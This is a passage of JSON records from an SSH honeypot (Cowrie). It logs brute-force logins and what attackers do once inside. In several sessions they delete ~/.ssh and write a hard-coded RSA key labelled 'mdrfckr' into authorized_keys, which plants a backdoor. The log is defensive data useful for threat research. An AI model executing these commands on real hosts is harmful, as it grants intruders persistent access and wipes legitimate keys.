{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:47:40.341840Z","src_ip":"139.59.14.27","session":"3932621ea193"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:47:40.710131Z","src_ip":"139.59.14.27","session":"3932621ea193"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:47:40.710983Z","src_ip":"139.59.14.27","session":"3932621ea193"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":38060,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbb19b776b58","protocol":"ssh","message":"New connection: 139.59.14.27:38060 (1.2.3.4:22) [session: dbb19b776b58]","sensor":"my-vps","timestamp":"2025-09-08T12:47:41.034744Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:47:41.035401Z","src_ip":"139.59.14.27","session":"dbb19b776b58"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:47:41.375619Z","src_ip":"139.59.14.27","session":"dbb19b776b58"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:47:42.749807Z","src_ip":"139.59.14.27","session":"dbb19b776b58"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:47:44.083331Z","src_ip":"139.59.14.27","session":"dbb19b776b58"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":39596,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5860cfdc695","protocol":"ssh","message":"New connection: 139.59.14.27:39596 (1.2.3.4:22) [session: c5860cfdc695]","sensor":"my-vps","timestamp":"2025-09-08T12:47:44.432947Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:47:44.433876Z","src_ip":"139.59.14.27","session":"c5860cfdc695"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:47:44.786026Z","src_ip":"139.59.14.27","session":"c5860cfdc695"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62894,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a53e71a8909","protocol":"ssh","message":"New connection: 217.72.205.35:62894 (1.2.3.4:22) [session: 6a53e71a8909]","sensor":"my-vps","timestamp":"2025-09-08T12:47:45.323213Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:47:45.324960Z","src_ip":"217.72.205.35","session":"6a53e71a8909"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:47:46.228165Z","src_ip":"139.59.14.27","session":"c5860cfdc695"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:47:46.576781Z","src_ip":"139.59.14.27","session":"c5860cfdc695"}
{"eventid":"cowrie.session.closed","duration":"10.2","message":"Connection lost after 10.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:47:46.587945Z","src_ip":"139.59.14.27","session":"3932621ea193"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38312,"dst_ip":"1.2.3.4","dst_port":22,"session":"91e759710bbb","protocol":"ssh","message":"New connection: 212.227.235.229:38312 (1.2.3.4:22) [session: 91e759710bbb]","sensor":"my-vps","timestamp":"2025-09-08T12:47:56.755420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:47:56.758687Z","src_ip":"212.227.235.229","session":"91e759710bbb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:47:56.923018Z","src_ip":"212.227.235.229","session":"91e759710bbb"}
{"eventid":"cowrie.login.failed","username":"mos","password":"123456789","message":"login attempt [mos/123456789] failed","sensor":"my-vps","timestamp":"2025-09-08T12:47:57.580946Z","src_ip":"212.227.235.229","session":"91e759710bbb"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:47:58.748196Z","src_ip":"212.227.235.229","session":"91e759710bbb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46200,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a70fc2d1781","protocol":"ssh","message":"New connection: 212.227.235.229:46200 (1.2.3.4:22) [session: 1a70fc2d1781]","sensor":"my-vps","timestamp":"2025-09-08T12:48:02.310912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:48:02.314709Z","src_ip":"212.227.235.229","session":"1a70fc2d1781"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:48:02.599048Z","src_ip":"212.227.235.229","session":"1a70fc2d1781"}
{"eventid":"cowrie.login.success","username":"root","password":"huawei12345","message":"login attempt [root/huawei12345] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:48:03.743412Z","src_ip":"212.227.235.229","session":"1a70fc2d1781"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:48:04.335162Z","src_ip":"212.227.235.229","session":"1a70fc2d1781"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:48:04.335887Z","src_ip":"212.227.235.229","session":"1a70fc2d1781"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:48:04.337186Z","src_ip":"212.227.235.229","session":"1a70fc2d1781"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:48:04.624605Z","src_ip":"212.227.235.229","session":"1a70fc2d1781"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:48:05.305078Z","src_ip":"212.227.235.229","session":"1a70fc2d1781"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:48:05.305925Z","src_ip":"212.227.235.229","session":"1a70fc2d1781"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:48:05.596483Z","src_ip":"212.227.235.229","session":"1a70fc2d1781"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:48:05.597364Z","src_ip":"212.227.235.229","session":"1a70fc2d1781"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47726,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bbd6b07d4fc","protocol":"ssh","message":"New connection: 212.227.235.229:47726 (1.2.3.4:22) [session: 4bbd6b07d4fc]","sensor":"my-vps","timestamp":"2025-09-08T12:48:05.889024Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:48:05.890049Z","src_ip":"212.227.235.229","session":"4bbd6b07d4fc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:48:06.182457Z","src_ip":"212.227.235.229","session":"4bbd6b07d4fc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:48:07.387992Z","src_ip":"212.227.235.229","session":"4bbd6b07d4fc"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:48:08.684126Z","src_ip":"212.227.235.229","session":"4bbd6b07d4fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49016,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e27524f4ca7","protocol":"ssh","message":"New connection: 212.227.235.229:49016 (1.2.3.4:22) [session: 4e27524f4ca7]","sensor":"my-vps","timestamp":"2025-09-08T12:48:08.984188Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:48:08.986863Z","src_ip":"212.227.235.229","session":"4e27524f4ca7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:48:09.280437Z","src_ip":"212.227.235.229","session":"4e27524f4ca7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:48:10.464792Z","src_ip":"212.227.235.229","session":"4e27524f4ca7"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:48:10.752540Z","src_ip":"212.227.235.229","session":"1a70fc2d1781"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:48:10.762652Z","src_ip":"212.227.235.229","session":"4e27524f4ca7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47214,"dst_ip":"1.2.3.4","dst_port":22,"session":"712323170e8a","protocol":"ssh","message":"New connection: 212.227.235.229:47214 (1.2.3.4:22) [session: 712323170e8a]","sensor":"my-vps","timestamp":"2025-09-08T12:48:18.715626Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:48:18.716580Z","src_ip":"212.227.235.229","session":"712323170e8a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:48:18.847636Z","src_ip":"212.227.235.229","session":"712323170e8a"}
{"eventid":"cowrie.login.failed","username":"manish","password":"manish","message":"login attempt [manish/manish] failed","sensor":"my-vps","timestamp":"2025-09-08T12:48:19.415861Z","src_ip":"212.227.235.229","session":"712323170e8a"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:48:20.552381Z","src_ip":"212.227.235.229","session":"712323170e8a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55714,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbb39e5591ec","protocol":"ssh","message":"New connection: 212.227.235.229:55714 (1.2.3.4:22) [session: fbb39e5591ec]","sensor":"my-vps","timestamp":"2025-09-08T12:48:31.528380Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:48:31.529321Z","src_ip":"212.227.235.229","session":"fbb39e5591ec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed2551